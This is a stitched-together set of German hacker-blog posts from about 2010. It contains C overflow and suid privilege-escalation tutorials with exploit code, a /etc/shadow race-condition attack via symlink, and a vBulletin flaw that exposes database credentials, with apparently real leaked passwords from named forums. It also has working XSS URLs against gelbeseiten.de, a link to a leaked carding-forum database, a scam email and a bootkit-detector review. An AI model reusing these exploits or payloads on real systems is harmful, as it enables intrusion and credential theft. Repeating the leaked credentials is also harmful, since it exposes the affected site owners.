tutorial[0] – Einleitung

Dieses Tutorial behandelt die Problematik von dem begrenzten Überschreiben von Variablen.

Jeder kennt die 0815 Overflows wie: strcpy(text, argv[1]) ….. LANGWEILIG!
Doch was bleibt uns überrig wenn man zwar aus dem Speicherbereich der
ursprünglichen Variable “ausbrechen” kann aber nicht bis zur RET kommt sondern
nur andere Variablen die im weiteren Programmablauf genutzt werden
überschreiben kann, ja dann muss man kreativ werden!

tutorial[1] – Praktische Erklärung anhand eines komplett beknackten Beispiels ;D

  #include <stdio.h>
  #include <string.h>
  #include <unistd.h>
 
  int main (int argc, char **argv){
  	char h [] = "/bin/uname";
  	char text[100];
 
  	if(argc > 1)
  		strncpy(text, argv[1], 110);
  	printf("%s\n", h);
  	execl (h,h, (char *)0);
  	return 0;
  }

Hier ist es ganz offensichtlich: Wir können h mit 10 Bytes überschreiben.
h wird im nachhinein als Argument für execl benutz was für uns aüßerst
attraktiv ist. Hier ein kleiner und selbsterklärender Exploit-Log:

  ./test `perl -e 'printf "a"x110'`

aaaaaaaaaa

  ./test `perl -e 'printf "a"x100 . "/bin/ls\x00"'`

[LIST DIRECTORY EXECUTED]

Somit konnten wir das Überschreiben von unseren programmeigenen Variablen
erfolgreich auszunutzen.

tutorial[2] – Praktische Erklärung anhand eines komplett beknackten und
umfangreicherem Beispiel ;D

Folgendes Szenario: Wir sind auf einer Linux user-shell gelandet.
Wir haben keine Root Rechte finden allerdings ein suid-root Programm
+ Quellcode.

  #include <stdio.h>
  #include <string.h>
  #include <stdlib.h>
  #include <sys/types.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <arpa/inet.h>
  #include <strings.h>
 
  int main(int argc, char **argv) {
  	int s,c, i;
  	socklen_t addr_len;
  	struct sockaddr_in addr;
  	char file_line[60];
  	char recvb[1024];
  	s = socket(AF_INET, SOCK_STREAM, 0);
  	if(atoi(argv[1]) < 1024)
  		return 1338;
  	addr.sin_addr.s_addr = INADDR_ANY;
  	addr.sin_port = htons(atoi(argv[1]));
  	addr.sin_family = AF_INET;
 
  	FILE *fp = fopen("prefs.cfg", "r");
  	for(i = 0; i < 65; i++)
  		file_line[i] = getc(fp);
  	fclose(fp);
 
  	bind(s, (struct sockaddr*)&addr, sizeof(addr));
 
  	listen(s, 3);
 
  	addr_len = sizeof(addr);
  	for(;;){
  		c = accept(s, (struct sockaddr*)&addr, &addr_len);
  		recv(c, recvb, sizeof(recvb), 0);
  		printf("%s\n", recvb);
  		close(c);
  	}
  	close(s);
  	return 0;
  }

Wie der Linuxgelehrte Leser sicher weiß, darf nur der Rootuser auf den Ports die
kleiner sind als 1024 lauschen. Dies wollen wir umgehen und mit unserem
Programm Packete ergaunern die auf schützenswerten Ports geschickt werden.
Wer das Programm selbst Exploiten möchten sollte hier aufhören zu lesen,
viel Glück!

Für alle anderen Schwachmaten:

  ....
  struct sockaddr_in addr;
  char file_line[60];
  ....
  FILE *fp = fopen("prefs.cfg", "r");
  for(i = 0; i < ---->65<-----; i++)
  		file_line[i] = getc(fp);
  fclose(fp);

Klingelts? Wir können die ersten vier Bytes von sockaddr_in addr überschreiben
indem wir die Datei prefs.cfg mit 65 Bytes füllen (Wir können gottseidank Nullbytes
verwenden).
Was nützt uns das?

  ...
  addr.sin_addr.s_addr = INADDR_ANY;
	--->>addr.sin_port = htons(atoi(argv[1]));
	addr.sin_family = AF_INET;
  ...

In addr stehen alle wichtigen Daten zur Verbindung für den Server.
Somit auch der Port! Nun müssen wir herausfinden wie diese vier Bytes
aussehen wenn wir z.b auf Port 21 lauschen wollen.
Dazu schreiben wir uns ein kleines Hilfprogramm welches wir Lokal ausführen:

  #include <string.h>
  #include <stdio.h>
  #include <sys/types.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <arpa/inet.h>
  int main () {
  	struct sockaddr_in addr;
  	memset(&addr, 0x0, sizeof(addr));
  	addr.sin_addr.s_addr = INADDR_ANY;
  	addr.sin_port = htons(21);
  	addr.sin_family = AF_INET;
  	printf("%x\n", addr);
  	return 0;
  }

Dies gibt aus: 0×15000002
Das bedeutet: 0×1500 = Rückgabe von htons()
0×00 = Irgendwie zwingend vielleicht noch ein anderer Sinn.
0×02 = Die sin_family.

Somit brauchen wir uns nur noch ein Programm schreiben was uns die
pref.cfg entsprechend füllt und unser Victim starten.

  #include <stdio.h>
  #include <string.h>
 
  int main (){
  	char buffer[66];
  	memset(buffer, 'a', 64);
    buffer[60] = 0x02;
  	buffer[61] = 0x00;
  	buffer[62] = 0x00;
  	buffer[63] = 0x15;
  	FILE *fp = fopen("prefs.cfg", "w");
  	int i;
  	for(i = 0; i < 65; i++)
  		putc(buffer[i], fp);
  	fclose(fp);
  }

Hier unser finaler Log:

  ./filler
  ./victim 5555
  [PACKETE AUF PORT 21]

Ich hoffe dieser wichtige Abschnitt war aüßerst verständlich.

tutorial[3] – Nachwort

Ich verzichte.

Die Luecke wurde heute nachmittag veroeffentlicht und vBulletin reagierte mit einem Patch darauf.

Die faq.php wurde nur indirekt davon betroffen und dient eher als “Ausgabe”, da ein Fehler in den phrases dafuer verantwortlich war.

Wo befindet sich die Luecke?

Schauen wir uns mal die /install/vbulletin-language-de-du.xml Datei an und suchen nach “database_ingo” – was finden wir? Ah, interessant:

<phrase name="database_ingo" date="1277901074" username="Adduco" version="3.8.6"><![CDATA[Datenbank-Name: {$vbulletin->config['Database']['dbname']}<br />
Datenbank-Server: {$vbulletin->config['MasterServer']['servername']}<br />
Datenbank-Port: {$vbulletin->config['MasterServer']['port']}<br />
Datenbank-Benutzername: {$vbulletin->config['MasterServer']['username']}<br />
Datenbank-Kennwort: {$vbulletin->config['MasterServer']['password']}]]></phrase>

Es werden uns also unsere MySQL Datenbank Daten ausgegeben.

In der englischen Version sieht das ganze aehnlich aus /install/vbulletin-language.xml line 3701:

<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>

Wie nutze ich das nun aus?
Wir suchen uns ein Forum, welches von dieser Luecke betroffen ist, klicken oben auf “Hilfe”/”FAQ”, geben bei “Suchbegriffe” bzw. “Search Word(s):” dann “Datenbank” (bzw. database) ein und sehen dann, aha, erster Treffer:

Datenbank-Name: vbulletin
Datenbank-Server: localhost
Datenbank-Port: 3306
Datenbank-Benutzername: root
Datenbank-Kennwort: my4moo

Bzw. auf nem englischen Board:

Database Name: pro_astrogaming_com
Database Host: localhost
Database Port: 3306
Database Username: pro_astrogaming
Database Password: gitl0st

Screenshot

Auf das, was man damit anfangen kann, brauche ich denk ich nicht weiter drauf eingehen.

Wie schuetze ich mich davor?
Wie oben bereits gepostet durch einen Patch von der offiziellen vBulletin Seite, oder durch ein MySQL Query:

DELETE FROM `vb_phrase` WHERE `varname`='database_ingo'

Soviel dazu erstmal, wuensch euch noch eine schoene Woche

ihr glaubt gar nicht wie schnell einige Projekte “spurlos verschwinden” oder einfach down sind und bleiben. Hab letztens meine Linkliste links durchforscht und entdeckt das gut jeder 4te Link nicht mehr funktionsfaehig war – schade eigentlich.

Was gibts noch aktuelles zu berichten? Naja, komm grad leider nicht zum Bloggen, daher hat GregorSamsa den letzten fuer mich erstellt (Dankeschoen nochmal ) da mein Laptop nun auch seit fast nem Monat einen defekten Bildschirm besitzt.

Ein neuer wird im Laufe der Woche bestellt und dann werd ich dort sicherlich viel Spaß & Zeit zum Bloggen finden und Dinge durchsetzen koennen, welche seit Monaten geplant waren

Soviel dazu erstmal, ich lebe noch

Ich dachte, ich mache einfach mal ein kleines Paper zu einfachen Race Conditions,

vielleicht interessiert es ja jemanden…

/***************************
*                            *
*   Simple Race Conditions   *
*                            *
*   written by GregorSamsa   *
* gregor.samsa@jabber.ccc.de *
*                            *
*****************************/

0x01 {
 Ein kleines Vorwort:
 Hier mal ein kleines Paper zum Thema Race Conditions.
 Wieder eines der Paper die geschrieben wurden,
 um Anfängern das Leben zu erleichter  

 Naja, nichts besonderes, aber vllt. regt es den ein oder
 anderen zum nachdenken an...
}

0x02 {
 Was sind Race Conditions?
 Race Conditions sind Situationen, in denen es darum geht,
 dass die Programmausführung von einem Programm solange braucht,
 dass der Angreifer oder ein zweites Programm diese Zeit ausnutzen
 kann, um den Ablauf des ersten Programmes zu ändern.

 Ich habe hierfür ein kleines C-Programm geschrieben, dass
 diesen Umstand simuliert.
}

0x03 {
 /** Simple Race Condition - Example **/
 #include <stdio.h>

 int main(int argc, char **argv)
 {
 FILE *f;
 char c;

 if(argc < 2) {
 printf("usage: %s <filename>\n", argv[0]);
 return 1;
 }

 if(strcmp(argv[1], "secretfilename") == 0) {
 printf("filename correct\nreading %s\n", argv[1]);
 }
 else {
 printf("wrong filename\npls w8 4 next try...\n");
 remove(argv[1]);
 sleep(5);
 }

 f = fopen(argv[1], "r");
 if(f == NULL) {
 printf("cannot open file...\nmaybe wrong filename...?\n");
 return 1;
 }

 while(!feof(f)) printf("%c", fgetc(f));

 fclose(f);

 return 0;
 }
}

0x04 {
 Überlegungen:
 Schauen wir uns dieses Programm an:
 Als erstes überprüft es den Dateinamen.
 Wir gehen einfach mal davon aus, dass wir
 "secretfilename" nicht aus dem Speicher lesen
 können. Das könnte ja auch eine sha-1 Prüfsumme
 des Dateinamens sein  

 Wenn der Dateiname nicht richtig ist, wird die Datei
 gelöscht und es werden 5 Sekunden gewartet.

 Später wird versucht die Datei zu öffnen und zu lesen.
 Wenn der falsche Dateiname eingegeben wurde,
 ist die Datei gelöscht und kann nicht gelesen werden...
 Oder doch...?
}

0x05 {
 Angriff:
 Da wir secretfilename nicht wissen, probieren wir
 einfach mal so, das Programm zu starten:

 [samsa@hades ~]$ ./rc
 usage: ./rc <filename>
 [samsa@hades ~]$ ./rc test
 wrong filename
 pls w8 4 next try...
 <5 sek warten>
 cannot open file...
 maybe wrong filename...?

 Die Angriffsmöglichkeit besteht in der Wartezeit
 von 5 Sekunden.
 Die Datei wird erst gelöscht, _danach_ wird gewartet
 und dann versucht die Datei zu öffnen.
 Daher haben wir ganz locker Zeit, in diesen 5 Sekunden
 die Datei neu zu erstellen, damit die Ausgelesen wird:
 (In dem Beispiel gehen wir davon aus, dass wir ein
 SUID root Programm haben und /etc/shadow lesen wollen)

 [samsa@hades ~]$ ./rc test &    # im Hintergrund starten
 [1] 1337
 [samsa@hades ~]$ wrong filename
 pls w8 4 next try

 [samsa@hades ~]$ ln -s /etc/shadow test    # während der 5 Sekunden eine Datei anlegen,
die auf /etc/shadow verweist
 [samsa@hades ~]$ <inhalt von /etc/shadow>
 [1]+ Fertig            ./rc test
 [samsa@hades ~]$

 Ganz einfach, oder? 
 Selbst wenn "test" besteht, wird diese Datei gelöscht,
 da der Dateiname falsch ist.
 Allerdings wird erst _danach_ 5 sek. gewartet,
 und wir erstellen in der Zeit eine Verknüpfung zu /etc/shadow,
 die dann von dem Programm ausgelesen wird. Easy, aren't it?
}

0x06 {
 Schlusswort:
 Das war kein Übermäßiges Tut und in ~45 min. geschrieben.
 Aber vllt. hilft es euch, Designfehler bei Programmabläufen
 zu verstehen und auszunutzen.

 Wer noch Fragen hat findet mich da:
 gregor.samsa@jabber.ccc.de
 irc.freenode.net #back2hack  http://back2hack.cc/
 irc.ircdotnet.net #free-hack  http://free-hack.com/
}

0x07 {
 oh shit, da greetz section... but meh like mah
 1337 friendz so meh hav 2 greetz them here!!!111
 J0hn.X3r - 4 u 
 BlackBerry - meh like u :-*
 h0yt3r - caaatz meow <3333
 Invisibility, Cheese, 0x30, aKiller - only: <3
 OpCodez - drugs r bad, but u r cool 
 ...and kazuya, RedTiger, soulstoned, gesocks and teh
 other user from #back2hack and #free-hack i like u
}

/** n0p **/

                                                      |\___/|
              -=[ISSUE - NO 1]=-                     =) ^Y^ (=
                   -=[OF]=-                           \  ^  /
                                                       )=*=(
 ______________________________ __ ____________ _     /     \
|.-----.--.--.--.-----.-----.--|  |   ___ ___ _| ||   |     |
||  _  |  |  |  |     |  -__|  _  |  | . |   | . ||  /| | | |\
||_____|________|__|__|_____|_____|  |__,|_|_|___||  \| | |_|/\
|  | |                                   ______   |__//_// ___/ __ 
|  | |               .-----.--.--.-----.|      |.-----.--\_).--|  ||
|  | |               |  -__|_   _|  _  ||  ||  ||__ --|  -__|  _  ||
|  | |               |_____|__.__|   __||  ||  ||_____|_____|_____||
|_/   \__________________________|__|___|  ||  |___________________|
                                        |______|
         FEATURING             ~~~ |\                  A present
  Germanys next Darkmarket    ~~~ /()/              brought to you                                
         Carders.cc            ~~~`\|            by some happy ninjas

Dieser Text war am 19.05.2010 auf verschiedene Foren zu lesen und auch Seiten wie heise.de berichteten drueber.

Wer den vollstaendigen Inhalt sehen mag:

*klick*

Sieht ganz gut gemacht aus

Solche Leute verdienen respekt und nicht welche, die sich ein iPhone gecardet haben oder CCs verkaufen.

Doch war sowas zu erwarten?

Meiner Meinung nach aufjedenfall ja. Entweder ein Bust oder eben sowas.. Sie bekamen in letzter Zeit sowieso “zu viel Aufmerksamkeit” durch die Medien und Co – ARD und ZDF berichteten teilweise etwas ueber carders.cc und in der “scene” ist carders.cc zwar teilweise “beliebt”, was dark market angeht, doch von “richtigen” Leuten, die ihre Faehigkeiten woanders haben, wurde carders schon immer abgelehnt.

Stimme auch BuntspechT seiner Aussage zu:

Nun hoffe ich doch mal auf angemessene rechtliche Konsequenzen für die Betreiber und finanziellen Unterstützer!

Aus http://buntspecht.us/2010/05/19/carders-cc-exposed/

Noch am gleichen Tag veroeffentlichten die Betreiber auf twitter ein kleines Statement dazu:

http://twitter.com/carders_cc/status/14261947002

Liebe User,
Wie ihr wohl schon alle mitbekommen habt, wurde Carders Opfer einer Hackerattacke. Meiner Meinung nach ein dunkler Tag für die Szene, auch wenn sich jetzt viele schadensfroh im Keller einen ablachen. Leider wissen, oder verstehen diese Menschen nicht was für Konsequenzen so etwas haben kann.
Wie dem Deface-Text bereits zu entnehmen war, wurden einige IPs geloggt, dies jedoch nicht absichtlich sondern durch einen Fehler des (ehemaligen) Techmins Zagerus. An dieser Stelle ein großes Entschuldigung an die User, die vom IP Logging betroffen waren. Dieser Vorfall sollte euch jedoch daran erinnern, dass ihr immer mit einem VPN / Socks5 / VicSocks, wie auch immer, unterwegs sein solltet. Alle User sollten natürlich ihre Passwörter ihrer E-Mails, anderen Accounts, ICQ Nummern etc. ändern! Selbst wenn nun mit der gehackten Datenbank gegen uns ermittelt wird, was nach dem deutschen Gesetz eigentlich verboten sind, (aber die wahren Kriminellen sind ja ohnehin die Behörden) haben die größten Teil der User NICHTS zu befürchten. Von diesen Ermittlungen wird größtenteils das Team betroffen sein.

Nachdem KRON0S und ich uns einige Zeit unterhalten haben, ist uns klar geworden, dass wir uns die Tour von ein paar vorpubertären Hackerkindern die Stimmung nicht nehmen lassen (Es handlet sich hierbei btw. um die gleichen Hacker wie bei 1337-crew), und dass das nicht das Ende von Carders ist. Nein! Wir werden zurück kommen! Dies wird jedoch einige Tage in Anspruch nehmen, da wir 1. auf Heihachi umziehen 2. nach dem Hack verständlicherweise die Boardsoftware wechseln und 3. um zukünfige Hacks zu vermeiden, sehr viele Sicherheitstests durchführen werden. GGF. wird jedoch der Jabberserver schon früher laufen. Desweiteren wurde Zagerus nach der großen Panne bis auf weiteres suspendiert, und die Technik wurde einem erfahrenereren User übergeben. Wir sehen uns in einigen Tagen wieder!

THANAT0S im Namen der Administration

Aus http://nopaste.info/81779e1129_nl.html

Und spaeter hab ich einen Screenshot von einer eMail gefunden, welche ich euch nicht vorenthalten mag:

Ein Backup der MySQL Datenbank wurde auch veroeffentlicht, welches ihr u.a. hier bekommen koennt, da die ganzen filehoster mirrors doch recht fix am deleten sind – macht aber vllt bei dem ein oder anderen probleme (habs noch nicht versucht).

Wer sich das Backup nicht laden will/kann, sondern einfach so schaun mag, was da lief, dort ist es online und alle internen Sektionen einsehbar:

http://carders.1.vg/index.php

Aktuell kann man sagen, dass sie mit ihrer “Rueckkehr” schon gegen heut Abend oder morgen rechnen…

Hab ne laengere Pause gemacht und mir ist einfach irgendwie so gut wie nix eingefallen, was ich bloggen koennte.

Dann war mein Blog nun gut ne Woche down/nicht erreichbar.. die Gruende koennts nochmal hier nachlesen:

Was ist vorgefallen?

Unser US Datacenter Dateiload/Thomsn LLC hat ohne vorankündigung den Betrieb eingestellt und somit waren alle US Server am Frietag den 14.5 offline.

Wir haben umgehend unseren Support Manager kontaktiert, dieser versicherte usn dass es sich um einen Hardwareschaden handelt der “in Kürze” behoben sein würde.

Der Vorgang zog sich in die Länge, man versicherte uns aber das Problem beheben zu können.

48 Stunden später haben wir keine Antwort mehr auf Anfragen bekommen.

Wir haben 24 Stunden gewartet (bis Montag) und dann angefangen Backupserver einzurichten.

Das Problem dabei ist das die “Hauptlast” der Kunden auf US Servern liegt und somit mehr als die Hälfte aller shared Webspace Kunden betroffen ist.

Im Moment scheint jedoch eigentlich alles wieder zu funktionieren.

Heute hab ich den letzten Schultag vor den Ferien und werde dann denk ich, mir Zeit finden die Sachen hier zu bloggen, welche ich mir vorgenommen habe.

Jetzt gleich kommt nochn kleiner extra Artikel ueber carders.cc, da die meisten denk ich wissen, was passiert ist und spaeter oder am Samstag kommt dann erstmal ne kleine Monatsuebersicht, was grob vorgefallen ist

Zum Schluss zeig ich euch noch meinen Gewinn, welchen ich per eMail erhalten habe:

von Captain Maxwell J. Daniels <max.daniel05@gmail.com>
an kezzy_chuks@yahoo.com
Datum 7. Mai 2010 07:08
Betreff HALLO FREUND
Unterzeichnet von sbcglobal.net

Hallo mein Freund,
Ich hoffe, dass diese E-Mail genügt Ihnen gut, weil ich ein ehrlicher Geschäftsmann Vorschlag für Sie haben.
Ich bin Captain Maxwell J. Daniels Servieren mit USA Military Provincial Reconstruction Team in Camp Anaconda Balad und ich mit Ihnen Kontakt aufnehmen, um mich in eine sichere Aufbewahrung des Geldes Mission entdeckte ich in dem Haus eines verstorbenen Präsidenten Saddam Hussein Loyalisten während unserer letzten House zu unterstützen Haus vor einigen Tagen raid. Ich weiß wirklich nicht, wie viel in die Tasche enthalten, aber aus meiner eigenen Einschätzung ihrer über US $ 20.000.000,00 Dollar in bar (Real grünen Dollarscheine).
Wenn Sie interessiert sind, antworten Sie mir sofort, damit wir den Transfer Verfahren erörtern können.
max.daniel05@gmail.com
Captain Maxwell J. Daniels

Dieses “Deutsch” gefaellt mir – mag jemand einen Anteil vom Geld? löl…

http://www.gelbeseiten.de/yp/search.yp?distance=0&subject=<script>alert(1337)</script>

klappt nicht mehr.. dafuer heute:

http://www.gelbeseiten.de/yp/search.yp?distance=0&subject="></script><script>alert(1337)</script>

Da bursali auch immer Screenshots als Beleg dazu postet, mach ichs diesmal auch.. Screenshot stammt von “Southpark“:

Das der Eintrag nich aus 2 Saetzen besteht, moecht ich euch heute noch kurz Core.am vorstellen:

Core.am ist ein Board für Computersicherheit-, Programmierung- und allgemeinen Themen.

Kleiner Infotext:

Core.am ist ein Security und Coding Board dass 2009 gegründet wurde.
Im Gegensatz zu anderen Boards dieser Art, konzentrieren wir uns wirklich auf diese Bereiche.
Wir haben es uns als Ziel gesetzt anders zu sein als die Anderen, und unseren neuen Usern soviel wie möglich an Wissen mitzuteilen. Unter Wissen verstehen wir nicht eine Vielzahl an Schadprogrammen zu verteilen, sondern vielmehr den Aufbau und die Technik dahinter zu verstehen.

Zu unserer Zeilgruppe gehören Anfänger aber auch Fortgeschrittene, die sich mit dem Thema Computersicherheit ausseinander setzen möchten.

Unser eingespieltes Team besteht aus einem Server-Administrator, einem Designer, ein paar Codern und nicht zu vergessen aus unseren Moderatoren.

Und joa, was soll man noch großartig sagen, vorbeischaun lohnt sich

Wollt glaub nochn zweites Projekt vorstellen, weiß aber nicht mehr welches. Wuensch euch noch nen schoenen Ostermontag.

Nun zum ersten Punkt, dass Paper von novaca!ne und mir wurde nun auf Offensive Security veroeffentlicht, sein Auth Bypass Paper ist quasi mehr oder weniger eine englische Zusammenfassung von meinem Auth Bypass Tutorial.. ganz nett gestaltet in einer .pdf Datei. Finden koennt ihr es hier:

http://www.exploit-db.com/ bzw. direkt hier: http://www.exploit-db.com/download_pdf/11956

Der naechste Punkt ist quasi ne Art Video Tutorial.. von KellerElite.. ihr koennt euch dort nen kostenlosen vServer holen, mit 5GB Space und 100GB Traffic. Anschaun koennts das hier:

Das wars auch schon.. kurz und schmerzlos

Btw. hab heute uebrigens saemtliche Googleads entfernt.. wusste nicht mal das hier welche waren bis gestern. Dreist sowas, installiert man nen WordPress Theme und das ist voller Google Ads.. sowohl im header als auch im Footer.. und ich hab nicht mal einen cent erhalten, sondern der Coder vom Theme.. dreist Habs jedoch nun entfernt, damit mein Blog weiterhin googleads frei bleibt.

                █▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
                █  ▄███████▄ ▄████████▄  ▄███████▄  ▄███████▄ █
                █ █▓▓▓▓▓▓▓▒█ █▓▓▓▓▓▓▓▓█ █▓▓▓▓▓▓▓▒█ █▓▓▓▓▓▓▓▒█ █
                █ █▓▓▓▓▓▓▒▒█ █▓▓▓  ▓▓▓█ █▓▓▓▓▓▓▒▒█ █▓▓▓▓▓▓▒▒█ █
                █ █▓▓█▀▀▀▀▀▀ █▓▓▓ ▓ ▓▒█ █▓▓█▀▀▀▀▀▀ █▓▓█▀▀▀▀▀▀ █
                █ █▓▒█ ▓▒░   █▓▒▒   ▒▒█ █▓▒█ ▓▒░   █▓▒█ ▓▒░   █
                █ █▒▒█▄▄▄    █▒▒▒  ▒▒▒█ █▒▒█▄▄▄    █▒▒█▄▄▄    █
                █ █▒▒▒▒▒█    █▒▒▒▒▒▒▒█  █▒▒▒▒▒█    █▒▒▒▒▒█    █
                █ █▒▒█▀▀▀    █▒▒▒  ▒▒▒█ █▒▒█▀▀▀    █▒▒█▀▀▀    █
                █ █▒▒█ ▓▒░   █▒▒▒   ▒▒█ █▒▒█ ▓▓▒ █ █▒▒█ ▓▒░   █
                █ █▒▒█▄▄▄▄▄▄ █▒▒▒ ░ ▒▒█ █▒▒█ ▓▒▒ █ █▒▒█▄▄▄▄▄▄ █
                █ █▒░░░░░░▒█ █▒░░  ▒░░█ █▒░█ ▓▒░ █ █▒░░░░░░▒█ █
                █ █░░░░░░▒▒█ █░░░░░░░░█ █░░█ ▒▒░ █ █░░░░░░▒▒█ █
                █ ▀████████▀ ▀████████▀ ████ ▒░░ █ ▀████████▀ █
                █ ▄▄▄▄▄▄▄▄▄▄█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄███▄▄▄▄▄▄▄▄▄▄ █
                █ █▓▒░▓▓████▒▓███▓▓▒▒▓▓▒▒▓███▓▓▒▒▒▒░░▒▓██▓▓██ █
                █▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█
                                                  ebfe@inbox.ru
─   ──  ─── ──────────────────────────────────────────────────────── ───  ──   ─
 
                            .::P:R:E:S:E:N:T:S::.
─   ──  ─── ──────────────────────────────────────────────────────── ───  ──   ─

Was ist Anti B00TKIT?

Ein Bootloader/eine Bootdisk. Damit kann man den Rechner hochfahren, die Master
Boot Record Einträge der Festplatten auslesen, deren CRC-16 und SHA1 Prüfsummen
anzeigen und von der ausgewählten Festplatte weiterbooten.

Sinn?

Der Master Boot Record enthält üblicherweise die Partitionstabelle und einen
Bootloader (zumindest auf einer der Festplatten), der das eigentliche Betriebs-
system lädt. Siehe dazu den Wikipediaeintrag.

Bootkits überschreiben diese Sequenz mit dem eigenen Code. So kann dieser schon
vor dem Betriebssystem geladen werden und damit jeglichen Schutz ausgebeln. Zu-
sätzlich hooken Bootkits oft die “Lowlevel” Lese/Schreibfunktionen des Systems.
Versucht nun das Betriebssystem oder ein Anti-Virus Programm den MBR auszulesen,
bekommen es nur den hübschen Backup der früheren Daten, nicht jedoch den realen

MBR zu sehen.
Damit können auch jegliche Sicherheitsmechanismen ausgehebelt werden. Ein be-
rühmtes Beispiel wäre: http://www.heise.de/newsticker/meldung/B.859.html

Kurz: durch ein Bootkit infiziertes System kann die eigene Infektion nicht wirk-
lich zuverlässig erkennen.

Man kann allerdings von CD booten, sich die MBRs anschauen sowie die Prüfsummen
vergleichen – mit dem Anti B00TKIT. Da dieser (idealerweise) auf einer CD oder
einem schreibgeschützen Medium liegt und als erstes ausgeführt wird, kann er
auch nicht manipuliert werden oder falsche Daten untergeschoben bekommen.

Warum nicht gleich eine LiveCD mit Linux oder Antivir Software nehmen?

Ganz einfach: 5 Sektoren (2.30KB) großer Loader des Anti B00TKITs ist praktisch
sofort, ohne merkbare Verzögerung, geladen. Wie lange würde eine LiveCD booten?

Das heißt: Bootsequenz im BIOS so einstellen, dass immer von CD mit Anti B00TKIT
hochgefahren wird. Ein kurzer Blick auf die Prüfsummen und “weiterbooten” sollte
auf jedenfall sehr viel flotter gehen als mit einer “schwergewichtigen” LiveCD
und damit für den täglichen Einsatz deutlich geeigneter

————————

Soviel erstmal zum Allgemeinen Teil, seine aktuellste Version ist 0.8.5 mit u.a. diesen features:

release Version 0.85 (27.03.2010)

• CRC wurde entfernt (macht keinen Sinn neben SHA1)
• automatische Hashprüfung (auf der CD gespeicherte Hashs werden mit den Ermittelten verglichen). Erfordert eine benutzerangepasste CD.
• automatisches Hochfahren nach einer festgelegten Zeit von einer vordefinierten Festplatte. Erfordert eine benutzerangepasste CD.
• Konfigurationstools, um ohne Programmierkenntnisse solche benuterangepasste CDs zu erstellen .

Ein paar Screenshots:

“Default” ISO/Img

Benutzerdefiniert (automatische Prüfung/Boot):

Bootvorgang wird unterbrochen, falls die Hashes nicht stimmen:

gespeicherte Hashes werden mit angezeigt (nicht übereinstimmende in rot):

Dumpansicht ist immer noch möglich

Sehr nett das ganze! Und eine ausgezeichnete Arbeit von EBFE meiner Meinung nach.

Ausfuehrliches “HowTo”: http://ebfe.de.vu/antibootkit/howto
Download: http://ebfe.de.vu/antibootkit/release085.zip
Quellen: http://ebfes.wordpress.com/2010/03/27/anti-bootkit-v-0-8-5/
Infos & mehr zu EBFE’s Projekt: http://ebfe.de.vu/antibootkit